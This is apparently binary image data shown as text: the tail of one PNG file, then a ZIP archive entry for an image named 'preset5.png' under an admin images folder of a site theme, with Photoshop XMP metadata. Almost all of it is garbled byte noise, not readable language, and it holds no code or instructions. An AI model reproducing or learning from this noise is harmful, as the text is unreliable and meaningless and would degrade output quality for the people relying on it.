Ͷ��o�E�ϟ�[�J�t-��6cC��ʤ�O�m�����%5Ey�Y�?�������[~�|4��NZD�*���o���AI�9�g1�rz�f!��o*�I�2U�e&;+��J/%�3��-u��iY:�����"�0��P��Xc�'�۟�>�!�z�T��^Pd�s�4��$�$ �@OQT����gH
�S�!ߣ�c {���MDRG<I7�@l��>^�d�&�Y=�s�d��IR������x�@܁^e�ͯm6c[qW�=S�?��"����c����[<��<�q��T��Q6qWj�?��	FϽ\������Q]Kx��O�|prqz���uG��SGn$^�57�r�y
3�P���*���������@w��Ef�>��[xy3c�UQ��P��j�@:e��~�Kb�"��"�m�����D<7H/�n��N.�ra]mcug���P���k��~Cdv(��,�چjmU��T���4����yrq���f`��^balZI�z�n,o����5�I�`����v��i�:�4�yAO�T��ʍ�j�z�?��f�%�0�i&>�wv�A��:͐�E]"�B�7W>��,w��i�)���J?�o��\�zv��������{�����`��b�Pi�PkB�Y��
�Tf}��s�n!�l�О� �&��m1��j����S��=����\f]���k�q�=��a����lJ[[^^��;y����;��U���ݜx|��}äm]>���Ē��c�H��|�f�g�;���oXsl�I��2��=���{�=�3 �@�@&jH��>?
�J-a�3z�p�N������J-�)_�!�;#�k3���l����t����h�B���T{k^�2M���/w�;�{��Y�!���bXy?�����q�'T�0 �&�r��ġ���'l�WC��f��KLo�*g���9E����5�&R����ۣ7���w����)q��G
oo�k]��~=�8���o���@
h�̡�/Z*:��|��P������&]�k�	�ȯ���f�X�1�0}�q[��|���T|�����$�*:�}��#Ʈ�6�
�R.�!�����W6c�V�e���3�;�Lu��ٜ���i��c#��=�8�n�*���2���X,���ef��r����f�D-�wd���Tđ��4x�@�E���h1��y��v&:6ϡG:�u�ʑ��=�u�V�x[^
�
�$����{��~z�|s�$�����g$�T�n���?�5��B�Z�0�"��#A6_x�X��N�<���D*a=��9����9�$>?��Si�չ�쀸
M^e�D�]��>=�}��.Le��;�6Fe���?YzeMCU�_�`�fwS��(7S]��Ԧ�_��,�^����j��=�׷���泩����w@	˸'^��|^~QoM��`k�h�_�'�w6��P$��}�ﭞ�M+��q�:s�	[�r�q�ߠ�j9��z�T�)xX7��*jo�-�����~U�6�D���F߹M5碞G0�5�<����;Ն����N�F�};w?fw��5%���CQ�������W�$v?q�?�Z3��������V�ҷi����;'���8�S�q�Y�{'��ro�Ҹ���&��tv?��N��X����t8�=}�|��_����c1��;�$�˯�t!�(u`~�
�ô�X,��m��/��><�a#�/���íz�l
ԍ/>=M
9KW��s���]i�h��;2��p�
����L�Bƙ�|/>?�XR\S��
���zVw7�*<b`�����z-���Ƴ�D�)W��@P)T��ɸ}��Rɓ�G�u����@�'< �@?F l��ȑ~CƉ�� ����
�����`Qt��u��V��h�;����9����tRaJ�@�;��B~��k.�rĵm��P�Z�-�]e�Q<���ޛ���}�#y�=b`Y���G*�w�2<=0 �LL�={/��V�ؼ��+�2�#��w,���,K��+{��o�Z�؛����z���=H�`80�Y����m��_W�4/*�(�&w@!𷝰�w��:��>x���j��X@��Ɩ��t�=�.GԐ��@�J-)5�
q/�-?)6������@��
����G�[e����f⥒�"O�aTj�����\J����lS-��C�� 1D�~v�F��&E��d
T`̽�Ѕ�H�N3���r2r��a�g/$rϭ�:����'9�0	����qG���@܁> �$�
�~2�kR��^����7e�R)	7�[���Ǜέ9�?��4<5��)�i�*S��q�����+q���i�~:u�x��ީ�H�s*2�|K����C�ؐ��I�u�_շ�e�'f��Y��A-�t9���o?:�a��G����������5��2M�FU�R���o�RKy��(�~��YGUw��R��Se��
C��bS�o,��oM�K*�Qi{�Gqk�מ\��wx�@�E�����?�f��nr��?��>-ul�,��O�^-80�/ g��2���I�/�'d��9���i�����<M��g$'�ӣ�����0�t�[g�f9J�6	���9򋸲���,ʎ(�|���C�?}t��њT��
��,Km��{�뉝ŝ�sk{\����
/��yh������;g���lM*�"�'�)v���T��jO-y��.�-º�_��9�*�c�a\�P�m��4��+g���ԗ�w��@�M �駸�xn��W�CȮL(x~}۬�n&=~$�<�i^TQM~AuZF�/B(	y�M�1��6c7N��˵]�P���e�m�@n��M<P�, a�Q�f�Izi������$u��c�&��WJzc�;`S%>?::7���W��$>��,
3-�:y�^  �)��;�k	���C�wW�x��������]���e��.�����#�SoIT�qo�|O.��T�@�4���8.L��@��̔�?���ob��Ӿ�ꕐ�4*
����Q�D�����ƽY�Hӷ]�@���c1r��I���B���^��TW�X�o�5����Z�:ֺvܦnS�:K;%��)�-f�Y����{�]/#�Hx��A�z"asG,��"����=�O=5ïg�C���I��}r]H���J�"U�W�r��;�y��lyV�@qM�s��&�h�I�'l��QP%"+$4�^bALg�D:+�N/�I܅�<�qzcM���{6Ӳ�4iG^R��>Z�Ш�q7_x���,(�쮹����L2�R�^\O��T9*;2�c�"gc������+:���p2@�Pgk�񶥎m��(��D8L�y^��Շiw��c��1r�̲�O�N,�3p�=p��l|��z+:7����g���~���"w@�p3����l���^��=zq�P�_��+�s��
�y�3b�Kc����۰�{Y!�١��Qi�<��t��T7�� �=5��CW�w�6�4�*G��MW!9�v�q��rg'�J�RՑ�	���B�)R��tٳ�Yȿ{:8�vFY��L�Gڌ�7p>q��nETC-erb.��Gm���9���߆G	�P,x�:�]�u�[�pu�������x	EByř�i��}skl^$���D�:s���Qv�4/*� �vRP�D�fl�QC��b�Kg���k2]��������K��.�	$'l:�F�ePK�����; �T�_�*�s"����4�����2�RŭԱ��������H�w]��仍4}��:�c$*;,";4>?:�2K�f�V��:C�
���=��	i��[����m̵���{��N��#ϯ�c c���7�b�l����?*�����zF�W�tA�Kk�CE��8Lk���a⶞>nh��ﮓ����~?� 2�e�ILnD|�����g�O�l�n�3������HÔX~:���C��Kc���%��h�����\��nz;��r>9�%����=���a��s^����Nc|E=L�})�4���;�&�e���L���!�w�SvdM1�;6]��v�[|#��ԛ�5�m�d�n�c��tW/cM3ҧ�*��'9��Osߏ�r�jh	�S+�~5f�d�Ox�@܁$�i���H̒B�Y��d
b�F�5�ՁW?ܦ�����³�Fc>��Nk񌲔��'e�,:i(��͵������ʬ�^ˬu�	T\������aJq^sӑ�}7/J�l�2���Z)�(�U8��gbh��γ��1�\T������[��k%S�M��Ms�/�厖�C�)��@�)E	�F��
�׭ܛ��+3f�/Ղ9$��%�P�%�8�s������ϑZD-�2n	j,�ը��O��5;{bN���Th�c�͜�:Tv�{|��F¸���L�-���4͌ێ��͋l}w�2i�B�8i����jau��+I���D�����|�GDf�b�l�_��@�;�l��_����
s�@�Ȁ��NF.ƞ�^�r5�ܭgA�m0�s���%);��?_���\X��F�mE}yg�	�x(��1�FGA{�G�8&a����t���[���1'�����&l�����o�|BRvo����x��=¸�[��[��������f<� ��h���W9�H�~zDVHp������0�
]9�mQ.��+q]�>��m��)��r��=,_Ę��#!�\���T�b≔��8���%:��6cg�kwG��3�Yн���/�`�gD� �_���.�w}��?��S�k,��[�g�Z �bA�1PG�����rD離�2������{��:�9j��FD�4��v�R�UpK�<];������&uᔮ'\Wvd2ˢ�Aq�Hʎ���F��ijn̩Ƞ(Q�vW7T�6VGd����Tci|>�[CW��L����6C
X��Q�}�a��kBrw@�,�//~���l����l�*�
b���
c:̻�a6l��JG���]�^R[����8
�)�F4�v;9	�����'��5Xp�#9�uyc�:�-��<�ww'��=�9L}��=�+F��m���p�ٌ���$�%T��3���/���; gr*2�k
Yt��g���+�:L鲯��A]~d�?L��^*�kd/�Z>�q�K}�G��*>�����m����@��>s�
C�X��P���ohЯ+˫�~�q�Y�ԣ��%xI/M�v�#�g����/Qg/I-y�����ag�-Fl�R�)��#�~{���o?@�?x�@����m��c�g������W�QK�P�X_CLj!=���s�1�$]�7�x^e����Ӿ�S�{Z�6�96ލ��B����Aqg�J��xu�������X�m��Y!����#�����H>��~��i�.6��Mt�<�[Y_��;�����Uw��5���γ{�DJ�3�GC3�u��t�S]�}Q����O��ӱ�]s�e�PϚ4 ���d���n��R�����G?~�P��T�B[E��P)��8u���[@�n�\	��':�|gL�=�C�\~z�w��Ш4�P(��^�#��EgѨ�e)��Z7S�'���t6��BB�1׶a=&�.Ф�;�k	�����5����w�lb��r9IdwGf�![�yȠ~V�t���3����4�ZOr�6V�v�Z�H�/�%�:�,�H�x�������n$^L)N|�c՗o���H��z���z�ys�������`��݅Ac6�E�>wu���}ww"��5p
K��V��w��I>v�H����ß:#�í&;�C����;;��|Wu!�qo��B
�;�X�a�?C�lա�~��;��o�����<qI��?l����C�{z�GA5��������w���k��E�7�m�ǒn*;���@ݠa�~R�(>���<���]�8G�O@�����k
#�C�>fV(�ۜ��A�h�h���`;�J�V�ӫ��?>�m���F6M��k)aKj���|x�
����w��"����Ӛ.��i�~��뷥'�So�Td����ܻ���QH����^|zZ�@��i��|���Vepj��4���E^ev?}�Z��}g0���i�:@@j�٪�	2K���5gp�P������R�k�����1�x[�R!g�@�㭯����0�۹��i[v�d������b�mm�mu$�gd���9��M5����֣o>���̭Ȝ�
2瑦;��2��3QG��C{���2�$��>2�5�J
�͝����� ̞=yT��~,b�G��i�zr��&^�=���Y)��r�-�AZ"�B
��hT2��f��Ȟ���	�m`�a2�c�$�Y-�i1���x��f�%���y����8���E�U��yH��h�"�ࡻ��6�4C�K�>�~�.G}U��?c�v]�����t8��ܒ��9SZ*�v��MT�j�L����T�`kq�jH뚸5�ը=��+��/�k�E��ymKaj��>�mЧξ�d؛X�ԐHi'��y+����S��0T^�N{)cr#xu��J�Q�g�-B�< �
ʬ_��t��ݏ��4?j�	�vО���$��e�Un���-�χ�
RY_�����[�_�_��D<�<i�,��Z��U��Y<���Pq���R�kgR�ߐqo�ހO)��G<�R�K�N
�8�n�*����ۅ�������!P���i�pb�/�M}�UuI��9���W?w�I-y����>|���݅MW�P��<�rMs�������ܴ��d��OLX2�ub�jbO��&�b�ӌw�l–���	���~�l)�7�D����e&:\���RW]��!?�}Q��a�,KEݔ���D���^��c?�f�v��C�?]M�����~�Om��d��"�D��|u��Z'��?�:���a��,�K���k�*�;�1N��z���7#[{��ld�����GB������Z�����7��g=�:���Ϋ�5Q�5����������2������̐�j��dcMsԪuM�P�D�%+�tm���o��u�K�De��|��б9F����YQ��VU_�U�V�X}'�*�.�/�WSMˑ:=*�*q��k�q�j�f�w���I�#3yQ��ж^����rn�ߏ�K�N*i3v��XtF�ě�p�w���`�Fn�^1�4�b�E�⚂�����܈��<�}�\@V������!�ZdţUu��*SM���́,ԽXp`l{�Z��|3�Wl��S�G�3D
INEFS;)��rVO�p���A܁z�/;)�Lu✉:z&�/^s�|���~k���ol	I���:w��X��Ef;�J;��}�֑��7#�C��Ƃz����h��k[!�g�٪USY��5X�jl
YHt9�/�/V�a�M��a����w�[5�I�q0��2��@ݨ�	�ߏ`�H,�]�g
�{{��J��ʱ�2n	> ����IE�Rb��K��誱4T�LeRI��>~�ŜN�%�$}��ܷ�W��6,��D�3��WT�W� $�G�i�ea��:H���;H<�����9Aq爅x��.c�c-��W7T��2�Z�%����<�ȟ����<)�F=�{��1�'�Ҿ-�w��=hCTvnW�
�-_�=�-������� G��d졭����s6r�l�`�Q+XQ��KYtV��<t�ȵ)ʼne)�A�͋��+�������[���nuc+�!���&���R6Ӳ��X��"xN>d��\֝��k��I���w��[r,�2{������B�w@2��0q�wx=�±�%
+��ϧ~�{:�)��J����	ſ�4���-�q���.��T������q�c7Ҩ4G#W��&2rQ�IΣ���܊,d�e�.�)@�2O���P����}���ן^��_"a�zi��G�>d���^tS-TF�@�9P�"*a�)���w�[�����ikǾZ��҇$ǩ�s���x�+A�x�
���6ѡ��\����|�F	��I�c��Nҕ).�m�%��A=	�g�g���ו"�/�)B�TT�W�-���M��:��ܦ��R�v�qf0�V����Fy��)�4��e��$:��l��ar�>��T���2$��Uv0�A܁v�K��f!�h��O϶'p�W,�]�����.&�HI���w0���%�60�n"���%���Ii��Y󼖣�-�wc�j�~��S��V:�z�OI�?��	)xUC%R����V˽��:�����Y���T�|:!al����;��F�q����?�]9�]��@BA�������3y��v�A��d�[�����C�=�u��/={Q�s*2cr#�cUvjlD�������M�Wj
/��Er�]����ʬ���������P!f,��:nc����g�
��m'ty,M��Leַs��A~z�mR�:������H|�\ۊC��T�c]�����Ex����֯��|�/�29������H�W�SV[\\[x1����\���\�Ѕ���
�;�P��n�)�е��WA�{�a\ّ�m��-qeo1���r�r^}k���_/t廹���}w�E���i�0�B5Ӳ�4�E-Y{��n$^|�ԫ�M�A�4	`�$�[N%�����ԛ�­3��Aꚸ�_X�^���v�{9K��^QW��TC��c1R�6�lMd�ス/�ɍ@���`�z�U�Ә/�Q��l��HI��o�x�@ �읞H��[�J�Ѩ4�ɤ3I��G���#�'��'�"l)kK��n`��LziJ7��{���Y��'|��H��$�Yy;#����F��e����1���k&�CF4icSM_ͨ5R|]��/lI�( 9G�F�J��i�,�
��f)���#�Gz]�P�aNj;�w�l“t��mұ.�-�{q$ �|��cn�ޛ&}��Iy�v��_�Ta�z�
C�32�
ԍ�9L��_9rmx�CYr�r�j�크xd��?,���p�Z����fҕ$��V��
	��}�k�sg[h� ����b8B�i����R�1�43׶2�0%e��[�������'#w����..�]vUzV��}X{����u%�1���
j������"�2K�����v��*��C�p[0�u�Q��>��9��;�����Y�'�~��{^g�"�����������=Ό��}AU�Ǡ�&�YaC����o��}{����v>��V0��Vgi���Z2�18l�*K����Cݗ~=��V�m?���;����<��z� �&)�q�+��1�&�x����N);�F�c�f������ou9�{�Y��R�BG#��s~���˸�ZP�[�X��ojn��"���F��Ě�PQap�Y�c����dki���*R�.d�,7/�����Bqn��:6'����(4ƚf��;�:E�n�5�W"��7�����6O�@�-3m+ԙ�H1�9L3�Z�Z<gj�T��
�{�V�Cr+�r+2���2�
��w��ͯ�ğS���8��	-٠���gq���'zj�Hp{�~6c/Ĝj��L/	�Z�>%_��rq]dv(���T�q����=�{������gz�U�-��Gр�@5�{{Ǚ���|\<��5!.M�"�$Q.A���y��(���0ղ��2�o���έVj���<;`�����'�lMK�!��G/`�g�v���
[5׶~�E&�~�m��׻����z�����س�x2�I*����G�U9?e�Y�=���X]��G l��Kn�Յeܟ�@�FG�;<; �v���Ăؘ����\�P�T�I
���D����L5y���[������b����w�[T�⚂O�ģ��6V'>M+I�2�J�\�T���J���֜�����3$�.iD���n�̮ȠS������(0C����h�vR�����4z��R�&�i�4W9��jY��z��VWqM����G��:�N�JẀ�̔�Q���������+F�����}{�a��yQ@`��4�T�bg��
���]P'�x���NH�]c
�ӫoK�s��6�[�۽�в��T>��7/
�i�WBQM�x�p�Jg���%_����#!���$J�r��bgcw�`�gg�i&��
C���5��33@܁�EP�Y)��$Q�a?�ގ�6��%nө}bi/����j��8�X�X|cd೔���~u��S��Yt��7�m���Aw���ww砺���{�о[���]�I��mp�d˸���k�o���xnuFY����ڪ���z�W�KjG،��}�U@>$ĈD�o*�8�x�N
:��'̭�x�7{���V_�a���6�P�P%�ZC�c0�}Q=����o�Q�m�����8�/�x���vk�����c��̐�
Xq7�h�ȈF�v�:4�n{���Q�^����T�C���MW�����07So��/�\W�CD�1��<�נ�sܦl���N1?w@n��g���s3�RZɳ����Oτ����L:[�1�~��� �F�Mi��r����l��P�O���u#񂝁���ɕP#ڞ�{E]���Xu�fMc��~�D��E�=<��Z��0������3�}afYZ{vh�@Ac�^Z�,OK)N,��ϯ�y�w6�"#�4���	����|�tQ�;B��JJ��z8d/�|?�F\�
����������n�m�7�|v	���١U�42�&��	,g�{'��VfuoȮ�2������	PT��qv��T�(	�  &����:���\M2�8%�6�&Q'�c&��vjSk��фV�U+��#��E��P��R.Y��\�]��]Cq��\�~�a޲��x������6i��m��~~��Y�r�G��{���_}���Y�s�!�_���c��Aɝ�;>��P߇
T9eu%�6q��\r�̵��ٗJ�}:넓���u^����E�r����������f;yL�v��W+R���}�2k��h:5��呅��nF%��w�U�R��uz�H��{iRPr�T�{��z5��y�Ŗ�~Z&H%�Q^Juw�Z�0�mA�������������1�w���WM������xh�w�t�V�9tww_���խ߶f��Y�[{#D'�P7�&(�Tb��<&=z���;����o�sGM�U�[?�Tk�y�ג-�{�bQ¡�쟐who�X�!�'��u��X7m��{�r�$�ȹ:��y�o��^�������2܏ž�
6-;)\lͷ�{��o� 
ׁ^!q�_v����:T9��r�Z��a�m�&:�����sF6�Sba����)���~�TtN�T9�^$��$���2ml�w�Y��ϭ}��X�z3���_�!�9��(L�5F�v��w�N���uv2���ޮ~�.ަ�᎓e
��Ӎ�m�EП�����{���vK즽�v~~��YS��]"�����u[~ړ���£k��}g2~��x��+�ᅖ߿��e���ݽ�5; �k1�l��Cߥ﹩�kL]x����gC��˞�x�)�]�����O/u6�ͱ����=�z�(��m2h���}��9I^]����l�q�4Q�7�<���8�P���w����.I�p�X�P���������-�.�U��Z����sNe�|�q�D�]i~,��C�^T�w���6V�$i��x��8���J/U7+'j�U�߬-��h(}�WZ5�R����}p�s��r�2�mP�FT6U�)a���n3일\|���2�Rq>w�Q��;�:����kc������v}�����ɾ`����^
�wueӭv�ZDޔ�٠�K�?�r#�Vc9�N)��Z�O�4�Mg�ٽGR>�<�1�4y4/�����D<�O�Q�
2���Ԩ���Uz�I��1q������u�)W��;״%�d�Z:�
Uy�d�"J���<�X��o~��d��puts�ψ�?]����UY�T;&����\���\���R3�g�q<���)̘�R�,hNh�O�Ţ�����0ɾcݟŖ%wc�J�C�N;"�>x搈�W���߮�ٟ��UߘZۚXg�g���\j��.ݵ�g��T*��on﹊��Ea�`o�0T�t�q��6�!��6M�P�^f8+��y������:����e���s�D��l*�q-��-<�>�Y���|fUcŞ�_�<�e�?�|bS�፽�H�	�I��:um5�kg�ۯ��W���81�������֙�Z�찌j�i�]����ŤG��ݘ'r��������ڵ�Y3���So��3�tjn�x��W4����4���J��~�njo0����C�T��Uo���~c�Yi���J/K���F��ɽY?�[3�U-Jv7����)�[N."�Y�hfEZM���.'������k;5������;��Պ+""��/�ֶ��{3�+��`��ڶ�oR������󉐧ġ�b̈́�u?\���m���!��\j#�w��J��bqvx����m1�&�7X"}g���i������w9X��=�S^�����*̚��,�o��l(�꡾�{�Ǧ��f	 �,gQ���rH릁 ,�*&��xz~p���pv�퓯+y2�1i@�wtuweU����l
���0����v
���y��e&�	U�����_��l��;�Z�f�iXM��;pGWw�=���@�w� ��p��@�w ��@�w� ��;��@�w��;�p��@�w ��;�p��w� ��;�p�@�w� ��;��@�w� ��p��@�w ��;�p��@�� ��;�p�@�w� ��;�p�@�w� ��pL%�`[?F(2IEND�B`�PK!0�h�]]#it_sanctum/admin/images/preset5.pngnu&1i��PNG


IHDR�����tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:0351FE88858C11E6ADCFF69DB4ACADE5" xmpMM:DocumentID="xmp.did:0351FE89858C11E6ADCFF69DB4ACADE5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0351FE86858C11E6ADCFF69DB4ACADE5" stRef:documentID="xmp.did:0351FE87858C11E6ADCFF69DB4ACADE5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�	\YyIDATx��xUֆ=꽹�;qz���$���OYv��]X`�z��B��:=q�^U���%��H#ɲ-ɒ}�G�#��3����{��`=?�t,H� ��;��� � ��;��� � ��;��� ��;�;��� ��;�;��� ��;���� ��;���� ��;����� ��;����� ��;��� � ��;��� � ��;��� ��;�;��� ��;�;��� ��;���� ��;���� ��;����� �@l�
X��A;�;С���,V;�t(�@��CX�.���ݖ���S�),w��0��i����
��A�X�@G�^cq��
��€w�#p�V��E%����Gנ�(dd6[��K���
��D)�˵^[�$�n�� ���2@�����
�dAS�{�s�:*\:9�K�fnF"F��ީĽC��Y��eH��HύN|~t"	�%�/�IS��V�0tlwt��<.���v:ӚmόL���"��,�W`��H:��+����'6Wˌ�˵�+u�-�
��z�;�|<#��	9B����p�ٶ��p�Ne�������D�>��"�΂�
��$@�;�>1eNz������G'y���j�����
�
t�-Dk��]o�
�)!�$U�k�+�d������������y_�˷%�|-�;����8oNJ�P������v�R�d�
���f[�ʬ7��ɋj
T2v��|$�{K4On�	p
/�KJ�6�Z���/[_	����� ,6����Τ�"����$��݃���ȑ%��s��W���-�>m��O�?�{�7=f� �UM���2@�4X[��Ә���yp�ȧ�W)͕
3z����0�qy�n	t�h��v&n�-���_������g��vN�;8�9,nx�K���,��~X��w�xq]f<Q�#��+�d>׸�������OW�
�2�+�e&�E,���S_(��[�3}��%��x���H�e�%�*���&"aE�^����?-�B?�W�/�o�:Q���.����3[k\s_�N����e7Lpw����D؝%�����x��L�ޒ,.E�����$6�B�+S�r�ʎ7�
���jNU���M��u-��Z��"��W�$F������lh����I�3�(:W�_qZnm��gA����>ب�9=��OHn{���q��6��eIv�D���ݿ@8
�;�tM���e���K*���ƣ�=�~g:{~t"��)v����(�S[�?���/���q�@܁�cM�B� S�X�����ۓSS���Qw��V�.�
v�����l�Ԫ-��U<;*anO>��}pHڢ�
"�e��Js�d���j���$�/�A��@�$o_�ˡ�2���8M��LJ����ͩ��K��XT������q:K�
^���Xl��:U���ےn�㘬�x�Tn:R��.5n�v���7��ᴴ$N�����:+�w��vY���:����
�e�p1��d���]�W���	��&�h*��#��^q��m������x��
�����xڐL֤�[�3�/GH��瘟�:z��:�)��sp˔6]Q���d-��N'c����z��W�ɧ�Y��7ۘTo�N�T�•g�1��42f��Y�d8��P��f#	k���Q�E���Ds�BwEb<S�d�sh$��"$��.�����IfQI��	���E͍��@�w �ʎ9u��-��.ݱ�h�i��oW�=:�(�K����	��H��j~��vn����L����@�@n��؝:noTvd��c\��CD9�&�� ���"!9�ã"K��r~f��bh0�� �w�2���O�����8�OKM�D�d��!�����1����}���Njx�u��݃��:�� .nt������3)c���ui��%���8 �G��c���Z��+43��P�(�iIzh�1b�%�)�NM�+�n��,d��tR��?W\ƥc�sxlH�f�ԱV�i�������2O�`���J�MC`,���.`�Ӹ�4�n���t�|@�d��=�����I��[��qU���
�iΏe^ɕ2�����Ji>T�{l��=C[&7�XU��wJ�4��2�#��7V�]
��s�"��G���KenX��w�1Y���_��|���9DL2�s�F[��4.uH��Q	���8{�ћ	]8�	#�X�0:A��E���#J�Dž�荭�t�Ȟ���J�Ps�aɺ�Iߕ���no�f����&5v�����^��{��CB<:�����J��ޡ�L�ٔA��\�Ow8���A�¹Z=R�d�,DW��:��*��Y�K'�����g:f��*���֍�~�`J��_�RMrƒ������	�U2}��,����+b��lÛ��sW���(�M#]�>u���bi_a�h���j���Us|�T}Z�~��@�6$f���q2v;�Հ����\��,�,��1��<�TkY�S�H^I��ε
��������M�ɑ[�ͯ�Q_�4�Oc&�X�������9 	���?:�s����������BZA�9B��ҽv.��^�U����#��tF��|��q�c��Dã�UO^Q��Z��c�sO�n�G\2�I%	����-PHL�����LJ�p#���	���3�5>�Yk1�KH���|E��}�Xo��|��0Z�;��g�PV*��������Y,�Ǚ��y{rʎe�3
y�Ģnu���cs�A��I�Jmv;x�;-����d����a�z�z�j��]V8B�TƻSS�K�/﮿,64)c��T����Ǐ��.�2�{�zZ$Z�W8��?��6���-�,�⾂i]yYjc����^cA~��pCf�.5U(LH���s褱���͹��4��1��%�p�����35��x���^�o�xcb
�JZ]����ZGⰮ	�g-?.����/����fB>���	]bd�j��,�YNT�?9ȳĥ����č+�e�qCc���3��؄�dt����/��
�FמH��"��D6��a����HG*t&�R� %}��ƏK]+q|����ufq�/�K*W����(�Ԗj�ٵ����3yOn�A���a�

z�|[RHJ`��Y��,u��#�X2vUb�j}��O��������j�I�0�l��F�}��G��A��i�>�u6��:���q���{��x�9
�i�LgEJ��h�ъ��d���r�h}��bv�g�d�����5�ѝ���ƻ�g�Pv���}c���Kʿ�L�瘎ۜ�|$��2Y.�F�.�Zvk�t�<64,��h��ld��h�ۻp�i�����
M��yO��$�B������2*a^O>���Xm��@$�跏�;����I?�K��k���&5��g���e��[f��ų(Euz.�[���f�tVt��0ɷ�q2���xu$���R���8�oh�n+��ق�8�P�Hb�ӉM��?�S0�$H��w~�3kh&�U@A%c�@�T�E�����I��7*�w�R4�+�6"����A�'�����T����6_Uqi��I�j�D6ej7^��T&w,�m�[Q'����c����h]��(�N�_F&L.�d-b��u�'�|¡��y8�/�� �g�~B��\�\�Z����cs��bؔ��j��B��]c�!�:P�-L�'qb�sȥ��u�	�d�b�J�=��4J��HُU�\9�� ��{'��i�V��)�*����C�O����;�D����Gd��I6:���6����k-�/*k5�<!MВ�;�j�.����?��3n�����6;�ޙ����S[���p�UX�nJ*P��\��t��jB�p�R�6��jG�=,�5,�����K��J�k�h[�d5Fr����Sy�wH��+�*�wT��QX��{��K'=:4�_� ��~��R�����ӂ��۹Z��
��_b�T.��<��j/����U���o�����D�n;���*�N��
�YP�����q�.�M�̡x%!	9�B��Dm<HQ�aW�wV�Kbc��:���Yl��_��$���{�1�E��gvGQ�S�:�h��v4��_�˘H<$���T�'��c����Q���+
�Ek+ 0q�:$���3�����w�5��6F!� .�ؔ�Ɍ��N}�J�����0i�hcP:sZ7����+�ֲ��
}����n³i���wI�= ����^��Э�~�r����B��p�d����R!�h�/�%����9P��2���/����L$և�=�Tn:Z�0+�@���<t��5��Z�
-�C���G+t�ώF$ɡ��A;�9�
 �Q����*���Ym]P�G��R�!���h�t; +� ��U��Nm�,1 �6�Q���_o�_�}��35�aY,6-�3�Hen��F]���4�a���4�����|{���G(�{���!��o����8gV���J���V4{v>���qI�ߓ���9V���c����hn|4f���t�E�9_gP=�@P�X��`��K��1�6��f��b�����\{gV�TƟ7���	��e�T�{�_��O���kZ,�Z��T��ܬ��I�T��O;Wc�6�/3Z�nh�v���(�H��	ٚs
�xJ�uJW�0��Z����ѡ�NO��I���tX��{F��Lg����J02����x\��Wv�}u"�(at�Dž�^�������+��?&p7ߓ�%�_�hx��(l�7��?=*s�O��h�1���xZW.�+!3�;��9X���k�Rש-뜹qro-����p�$�R��1��x��E#Hi�¥N��츮�+�\o�Y�A��JT�՝��sIlD�����
��rUuCf�����y��N&��!����%�To<�����ɦ5�Ff�[��V[ܪ�ށH��%��D4�<�'���w��#:�������L�Bޙ��[Pm�\T�`>0�9$����]��Z"��3�BhP��vV�p�8<���S���	��iݸ���D�� ��
nuĽc `C3ٕ�"����[��	�1�@�3���G��1$�ʴ
�[�~��`�ڇ��̎��lأ��:\V�ݡM�3����I�Q�v垭ջý�bL.;�r�!+Ip����}�>�%�
42<�
��1���5>yd{�u��s��⾂Y�V�o*c�9QJn4�\�&�lA/��
��G�y��|{@C��%r�q��tEU�@�����Z�y�_T�Hb��(tD�$wM�#}����D�Ҙ[�����wD�1��-�Cљm�؉i̷&����,�dQI>q�l��q��9=xgj�5�W%Ft
#:�&p�V�����.�|���^L��E=����\���N�y��S�Z�e�Ľ�Q��,��(F����=���D��~—�%�N�]�d*�zE�!.�
K�ݚ�EǟՃW�07��j
��!�䲇e��Տ�ڱ�X#7X��5Π�Q��_{A��4Z�˴��lP���W��  �
���ʼ(b���?5"�<N������I;	+q�����O����|���r��{�W�%ڦ���Eu�;
��gD#c�@c]tUC2Yi���?K4J�Ȫ=R��̈�J~m'K@�$6�+ ��;�{���?$��L�
��7_�G+t�{��i������/�%��+u�,r��@q,Hk���j,W%M.�J����0�[P�����ʝes_�v�@~����$Ȩ?Q�C���J�NP��oJm�E�\t2��щόLԙl�2<} �@x9W�0{�B�T���zI��W7e��&v�dư,�;2���9�f�Xn�� 3u�-�=X�Ev}0>�lͽ�`���>yd�a���iL64D�3�}R�@
���/�KZ�O�Ȧ�6��C�}4+Tcd�=9�)��ṙ˵�Z�s��.�<T��LH\< ����,w\�#�U���ے
�;5��B�a�O�8���e��d�8��u�óX/�Kr�k�x��8X&7]�FhNյr�Ba���G�܁���m�H���p��[�5���T*�R�qS3�'��[tz�됥�5ۮI�Ӄ���o���,�AgE���ނfS�����Z�?$�#�>�GE����*�y��P��.Rx�5W%���Yo�,�`�!����^�W��W'BfO�pE���L���m5ĿbP��wf��E���+�r�vO������"�Y�T���`���7�d�y�n�eǻ+�*�����_.*A�rB�k���	�bq����E#&�g�f�े�r?U�wϑ�d����6�����2�ib�wZ+����A�{Q�ik�)Ѐ��ת-2�uln3N��ܺN��6��k��JZ�WP�6#���x� ֱg�X}4��
��;��	�dF��@��2��~w἞�a��P){�3)���4)H
��#��F��OVU,3��c����AJM�`˴Ӻ�,8�¥�h�n4�_^�78
	�";Q��6Z��>�ޅ�.�C'�ި��{�����W
c�#2<+�b�B���H���m0�q�ˣ��Ѻ;����T�UJ�̓�D�g��HI�t�>!���]u怊���S����]�{SS;h�{ܘ���𤀸1�9�&ޯ�7�*��=��d����t��7�P^�ewݜ��	�Mk\�6���M$<4tb��j���;K\�?=��3�ݣ;9[��m2�+�gNi,�w�V�ܳoMJ�����{\�$��Y���l�����yqb�/N�>:,
&<$��Q��/z��75����>��m�I%}z�G	V��O<
Ƨ7��wl����_��;K|s�aŠ��%��˫��e���`��qI�
